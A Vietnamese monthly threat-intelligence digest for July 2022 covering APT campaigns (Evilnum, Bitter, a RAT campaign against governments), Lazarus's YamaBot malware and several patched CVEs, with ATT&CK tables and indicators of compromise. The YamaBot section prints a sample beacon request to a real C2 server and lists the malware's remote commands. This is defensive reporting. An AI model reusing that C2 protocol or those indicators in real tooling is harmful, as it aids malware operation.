THÔNG TIN CÁC MỐI ĐE DỌA BẢO MẬT TRONG THÁNG 07 – 2022
Hàng tháng, Chúng tôi – GTSC tổng hợp lại các thông tin về bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài tổng hợp.
1. Các mối đe dọa nâng cao – Advanced Threats
1.1 Evilnum APT hoạt động trở lại với các TTPs và mục tiêu mới
Ngày 27/06/2022, nhóm ThreatLabz của Zscaler đã thông báo về các hoạt động mới nhất của nhóm Evilnum APT mà họ đã theo dõi được từ đầu năm 2022. Những cuộc tấn công gần đây cho thấy nhóm Evilnum APT đã thay đổi các chiến thuật, kỹ thuật và quy trình (TTPs). Vào năm 2021, vector phân phối chính được nhóm này sử dụng là các tệp Windows Shortcut (LNK) được gửi bên trong các tệp lưu trữ độc hại (ZIP) dưới dạng tệp đính kèm trong các email lừa đảo gửi tới nạn nhân.
Trong các trường hợp gần đây nhất, nhóm Evilnum APT đã bắt đầu sử dụng kỹ thuật “template injection” trong các tài liệu MS Office Word để gửi tải trọng độc hại đến máy của nạn nhân. Các tài liệu “template injection” chứa mã macro đã tận dụng kỹ thuật VBA code stomping để tránh bị phát hiện qua phân tích tĩnh và cũng để ngăn chặn kỹ thuật đảo ngược.
Kẻ tấn công cũng sử dụng tệp JavaScript bị xáo trộn dùng để giải mã và trích xuất tải trọng trên máy nạn nhân. Tệp JavaScript cũng lên lịch một tác vụ scheduled task để chạy tệp nhị phân. Tệp JavaScript này có những cải tiến đáng kể trong kỹ thuật obfuscation so với các phiên bản trước được nhóm EvilNum APT sử dụng.
Tên của tất cả các hệ thống tệp được tạo ra trong quá trình thực thi đã được kẻ tấn công lựa chọn để giả mạo tên của các tệp Windows hợp pháp và của bên thứ ba khác. Trong mỗi trường hợp mới của chiến dịch, nhóm APT đã đăng ký nhiều tên miền sử dụng các từ khóa liên quan đến ngành được nhắm mục tiêu.
Hình 1: Luồng tấn công
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Resource Development | T1583.001 | Acquire Infrastructure: Domains |
Initial Access | T1566.001 | Phishing: Spearphishing Attachment |
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic |
Execution | T1059.007 | Command and Scripting Interpreter: JavaScript |
Defense Evasion | T1221 | Template Injection |
Defense Evasion | T1027 | Obfuscated Files or Information |
Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location |
Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task |
Command and Control | T1132.001 | Data Encoding: Standard Encoding |
Exfiltration | T1041 | Exfiltration Over C2 Channel |
Indicators of Compromise (IoCs)
Files / hash MD5
0b4f0ead0482582f7a98362dbf18c219
4406d7271b00328218723b0a89fb953b
61776b209b01d62565e148585fda1954
6d329140fb53a3078666e17c249ce112
db0866289dfded1174941880af94296f
f0d3cff26b419aff4acfede637f6d3a2
79157a3117b8d64571f60fe62c19bf17
63090a9d67ce9534126cfa70716d735f
f5f9ba063e3fee25e0a298c0e108e2d4
ea71fcc615025214b2893610cfab19e9
51425c9bbb9ff872db45b2c1c3ca0854
C2 Domain
travinfor[.]com
webinfors[.]com
khnga[.]com
netwebsoc[.]com
infcloudnet[.]com
bgamifieder[.]com
bunflun[.]com
refinance-ltd[.]com
book-advp[.]com
mailservice-ns[.]com
advertbart[.]com
inetp-service[.]com
yomangaw[.]com
covdd[.]org
visitaustriaislands[.]com
traveladvnow[.]com
tripadvit[.]com
moreofestonia[.]com
moretraveladv[.]com
estoniaforall[.]com
bookingitnow[.]org
travelbooknow[.]org
bookaustriavisit[.]com
windnetap[.]com
roblexmeet[.]com
netrcmapi[.]com
meetomoves[.]com
bingapianalytics[.]com
azuredcloud[.]com
appdllsvc[.]com
udporm[.]com
pcamanalytics[.]com
nortonalytics[.]com
deltacldll[.]com
mscloudin[.]com
msdllopt[.]com
Nguồn: https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets
1.2 Bitter APT tiếp tục nhắm mục tiêu đến Bangladesh
Ngày 05/07/2022, Nhóm SECUINFRA Falcon đã phân tích một cuộc tấn công gần đây được thực hiện bởi nhóm “Bitter” APT ở Nam Á, còn được gọi là T-APT-17. Chiến dịch đang nhắm mục tiêu cụ thể vào các tổ chức (quân sự) từ Bangladesh. Thông qua các tệp tài liệu độc hại và các giai đoạn phần mềm độc hại trung gian, các kẻ tấn công tiến hành gián điệp bằng cách triển khai các Trojan Truy cập Từ xa (RATs).
Phương thức lây nhiễm quen thuộc của Bitter APT là gửi tệp tin qua các email lừa đảo. Chúng tận dụng lỗ hổng khai thác Equation Editor (CVE-2018-0798) ảnh hưởng trên Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013 và Microsoft Office 2016. Một khi nạn nhân mở tệp, mã độc hại (shellcode) sẽ được thực thi mà không có một cảnh báo nào cho nạn nhân.
Hình 2: Một số lệnh gọi API quan trọng trong shellcode
Nhóm SECUINFRA Falcon cũng phân tích một biến thể Trojan truy cập từ xa do Bitter sử dụng (BitterRAT). Nhóm SECUINFRA Falcon gọi biến thể này là “Almond RAT”. Mục đích chính của Almond RATs dường như là khám phá hệ thống tệp, lấy cắp dữ liệu và một cách để tải thêm các công cụ hay duy trì kết nối bên trong hệ thống nạn nhân.
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Reconnaissance | T1592.002 | Gather Victim Host Information: Software |
Resource Development | T1608.001 | Stage Capabilities: Upload Malware |
Initial Access | T1566.001 | Phishing: Spearphishing Attachment |
Execution | T1203 | Exploitation for Client Execution |
Defense Evasion | T1027 | Obfuscated Files or Information |
Discovery | T1083 | File and Directory Discovery |
Command and Control | T1105 | Ingress Tool Transfer |
Command and Control | T1571 | Non-Standard Port |
Exfiltration | T1041 | Exfiltration over C2 Channel |
Exfiltration | T1030 | Data Transfer Size Limits |
Impact | T1485 | Data Destruction |
Indicators of Compromise (IoCs)
Files / hash MD5
1bf615946ad9ea7b5a282a8529641bf6
a1d9e1dccfbba118d52f95ec6cc7c943
6e4b4eb701f3410ebfb5925db32b25dc
71e1cfb5e5a515cea2c3537b78325abf
d58e6f93bd1eb81eacc965d530709246
C2 Domain
emshedulersvc[.]com/vc/vc
m.huandocimama[.]com
diyefosterfeeds[.]com
91.195.240[.]103
194.36.191[.]196
162.0.232[.]109
64.44.131[.]109
Nguồn: https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/
1.3 Tấn công có mục tiêu vào các cơ quan chính phủ.
Ngày 13/07/2022, Nhóm nghiên cứu Bảo mật Email Trellix thông báo về một chiến dịch độc hại nhắm vào các cơ quan chính phủ của Afghanistan, Ấn Độ, Ý, Ba Lan và Hoa Kỳ kể từ năm 2021. Cuộc tấn công bắt đầu bằng một email lừa đảo có chủ đề chính trị. Các email lừa đảo có chủ đề xoay quanh mối quan hệ giữa Ấn Độ với Afghanistan. Kẻ tấn công đã sử dụng chính trị như một chiêu dụ để lừa người dùng nhấp vào một liên kết độc hại.
Email được sử dụng cho cuộc tấn công lừa đảo này chứa một tệp đính kèm hoặc một URL để cung cấp một tệp Excel. Khi mở tệp Excel sẽ thực thi một macro độc hại được nhúng, sau đó sẽ giải mã và cài đặt Trojan Truy cập Từ xa (AsyncRAT & LimeRAT) và duy trì tính kết nối bên trong mạng nạn nhân.
Sau khi Trojan Truy cập Từ xa được cài đặt trên máy nạn nhân, nó thiết lập giao tiếp với máy chủ Command-and-Control được sử dụng để lấy dữ liệu nạn nhân. Trojan Truy cập Từ xa có khả năng chụp ảnh màn hình, ghi lại các tổ hợp phím, ghi lại thông tin xác thực / thông tin bí mật và thêm các máy tính bị nhiễm vào mạng botnet. Nó cũng có thể thực hiện khám phá mạng và di chuyển sang các hệ thống khác trong tổ chức bị ảnh hưởng.
Hình 3. Luồng tấn công
Những kẻ tấn công đã sử dụng dịch vụ thư miễn phí Gmail để gửi các email lừa đảo trực tuyến. Dựa trên phân tích tiêu đề email, rõ ràng là các email có nguồn gốc từ các máy chủ của Google và được gửi từ khu vực Nam Á. Múi giờ của người gửi email (+0500 UTC) càng cho thấy sự tham gia của các tác nhân đe dọa Nam Á.
Hình 4, Tiêu đề email
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Command and Control | T1071 | Application Layer Protocol |
Defense Evasion | T1036 | Masquerading |
Collection | T1056 | Input Capture |
Collection | T1113 | Screen Capture |
Collection | T1115 | Clipboard Data |
Discovery | T1049 | System Network Connections Discovery |
Persistenc | T1547 | Boot or Logon Autostart Execution |
Persistenc | T1137 | Office Template Macros |
Execution | T1204 | User Execution |
Exfiltration | T1041 | Exfiltration Over C2 Channel |
Indicators of Compromise (IoCs)
Files / hash SHA256
7a6b87a7ba79160232579157b8ebcaea7660392d98cb6b8b3d562a383a0894bc
5e44f769aa9a745ade82589bbbd17c3687f2fb7c08b1043d8c5c44d28eaa20a9
fe1c8b01f5abc62551b0a3f59fe1675c66dd506d158f5de495a5d22d7445e6e9
fa9cb5608841f023052379818a9186496526039bc47cac05a6866f5fb0e70fc5
080fcc70c11248eaf34bd30c0dc9800b0b1742fe92c96c9995a1c73c0adf2336
465a59b7a97364bc933703a8fda715090c6a927f814bc22a0057e6a7134cb69f
5e082d1c85e591aebb380d7d7af56000ac0ef5fc32e216cb5fe7027bb9861743
f59dc209ee236e5ed78f83117865164e57a223f742c75f57c20d3da4cbe179e0
f32b0d71274ea93f27527079371e5e926e8d6a6f29d84ac602e48da0332c9f4c
8248432bcba6e8bb8731c0b8f2fbe4aae2e2d0fee2157477c83343743c39c1a8
06064b3b0158efbfa9d849c853a9783c7e9d07c5924275d0d33c6ac74c78eec7
886c5883113d279d97caaca2714860dfceb421c7297dbb3ee04a00b7d50b821b
b9584cf67e73a759d6c412962d4a9d7471c703f72e056cd24742a4b78c68ff2d
C2 Domain
107.173.143.111
Email Senders:
Nguồn: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html
2. Malware
2.1 Nhóm APT Lazarus sử dụng mã độc YamaBot
Yamabot là mã độc được viết bằng ngôn ngữ Golang, nhắm tới hệ điều hành Linux, các báo cáo gần đây phát hiện Yamabot được phát triển nhắm tới hệ điều hành Windows
Yamabot giao tiếp với C2 server sử dụng HTTP Post request với UserAgent được mã hóa bằng base64
Sau khi kết nối thành công tới C2 server, Yamabot gửi request mới với trường cookie trong header. Nội dung trong trường cookie bao gồm:
- captcha_session chứa dữ liệu theo format [16bytes đầu là ký tự ngẫu nhiên][ 16 bytes tiếp theo là key RC4][4 bytes cuối cùng là các ký tự ngẫu nhiên], captcha_session được mã hóa bằng thuật toán base64
- captcha_val chứa thông tin thiết bị và kết quả của các câu lệnh được mã hóa hai lần bằng thuật toán RC4 và thuật toán Base64. Ở lần đầu, dữ liệu trong trường captcha_val sẽ gửi thông tin về phiên bản OS và địa chỉ IP
POST /editor/session/aaa000/support.php HTTP/1.1 Host: 213.180.180.154 User-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzYwLjAuMzExMi4xMTMgU2FmYXJpLzUzNy4zNg== Connection: close Content-Length: 0< Cookie: captcha_session=MTE5NzZmMTYwYzRlNTU4YjhhNDZhMTM4ZGMwNzgzNTNhNmUy; captcha_val=W%2BIePQNeokInrSpb%2Fw1rTLAZvJAZQHmqAm2rXWdTsCvZ Accept-Encoding: gzip
Trong trường hợp dữ liệu có kích thước lớn, dữ liệu sẽ được gửi dưới định dạng BMP thay vì sử dụng captcha_val
Malware thực thi các câu lệnh tùy thuộc vào hệ điều hành. Đối với hệ điều hành Linux, câu lệnh được thực thi bằng /bin/sh. Đối với Windows, mã độc thực hiện câu lệnh sau
- dir: Thu thập thông tin các file
- Mapfs: Thu thập thông tin các thư mục
- Download: Download file
- Info: Gửi thông tin về đường dẫn và PID
- Sleep: Thay đổi thời gian sleep
- Uninstall: Mã độc tự xóa chính bản thân
- i: Thay đổi thời gian
- Others: Thực thi câu lệnh khác vơi shell command
Các câu lệnh được thực thi theo định dạng sau: [command][command parameters]
Indicators of Compromise (IoCs)
Hash:
f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb
6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1
C&C server:
http://www.karin-store.com/recaptcha.php
http://yoshinorihirano.net/wp-includes/feed-xml.php
http://213.180.180.154/editor/session/aaa000/support.php
3. CVE và các khuyến nghị bảo mật
3.1 Microsoft Patch Tuesday – July 2022
Trong tháng 7, Microsoft đã phát hành các bản vá cho 84 CVE mới trong các sản phẩm của Microsoft Windows and Windows Components; Windows Azure components; Microsoft Defender for Endpoint; Microsoft Edge (Chromium-based); Office and Office Components; Windows BitLocker; Windows Hyper-V; Skype for Business and Microsoft Lync; Open-Source Software; and Xbox. Trong đó có 4 lỗ hổng được đánh giá mức độ Nghiêm trọng, 80 lỗ hổng được đánh giá là Improtant
Dưới đây là một số CVE nổi bật được đánh giá ở mức độ Critical và Improtant:
3.1.1 CVE-2022-22047 – Windows CSRSS Elevation of Privilege.
CVSS v3: 7.8
Mô tả: Lỗ hổng leo thang đặc quyền cho phép kẻ tấn công thực thi đoạn mã độc hại bằng quyền SYSTEM. Lỗ hổng được ghi nhận đang được khai thác bởi nhiều nhóm tấn công.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
3.1.2 CVE-2022-22029 – Windows Network File System Remote Code Execution Vulnerability.
CVSS v3: 8.1
Mô tả: Lỗ hổng cho phép kẻ tấn công không cần xác thực, thực thi mã độc hại trên hệ thống bị ảnh hưởng. Lỗ hổng không yêu cầu tương tác từ người dùng.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
3.1.3 CVE-2022-22038 – Remote Procedure Call Runtime Remote Code Execution Vulnerability.
CVSS v3: 8.1
Mô tả: Lỗ hổng cho phép kẻ tấn công không cần xác thực, thực thi mã độc hại trên hệ thống bị ảnh hưởng. Lỗ hổng yêu cầu độ phức tạp cao trong quá trình khai thác.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
3.2 Ứng dụng web và các sản phẩm khác
3.2.1 CVE-2022-2294: Heap buffer overflow in WebRTC.
Mô tả: Tồn tại lỗ hổng tràn bộ đệm heap-based trong WebRTC. Lỗ hổng cho phép kẻ tấn công thực thi mã từ tùy ý. Được Google ghi nhận đang được khai thác bởi nhiều nhóm tấn công.
Phiên bản ảnh hưởng:
Ảnh hưởng đến các phiên bản thấp hơn bản cập nhật Chrome version 103.0.5060.114 (Stable channel)
Khuyến nghị: Trình duyệt Chrome đã cung cấp tính năng tự động cập nhật. Đối với các máy tắt tính năng cập nhật tự động, khách hàng có thể thực hiện cập nhật từ Google Chrome menu -> chọn Help -> chọn About Google Chrome để tiến hành cập nhật.
3.2.2 CVE-2022-22982 – vCenter Server SSRF vulnerability
CVSS v3: 5.1
Mô tả: Tồn tại lỗ hổng SSRF trong vCenter Server, được Vmware đánh giá mức độ Moderate
Phiên bản ảnh hưởng:
VMware vCenter Server (vCenter Server)
VMware Cloud Foundation (Cloud Foundation)
Khuyến nghị:
Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
Nguồn: gteltsc.vn
Bài viết cùng chủ đề
-
Cách tạo nhóm chat, kênh Telegram trên điện thoại và máy tính
-
Cách lưu ảnh trên Pinterest về điện thoại và máy tính nhanh chóng
-
Cách tải video và ảnh từ Instagram về máy tính và điện thoại một cách dễ dàng
-
Cách thay đổi tên người dùng và ID TikTok trên điện thoại, máy tính
-
CẤU TRÚC HỆ THỐNG GIAO THÔNG THÔNG MINH VÀ CÁC NGUY CƠ AN NINH MẠNG
-
Cách lấy lại Facebook bị Hack Pass và mất Email đăng ký
Chia sẻ ý kiến của bạn
Bạn phải đăng nhập để gửi bình luận.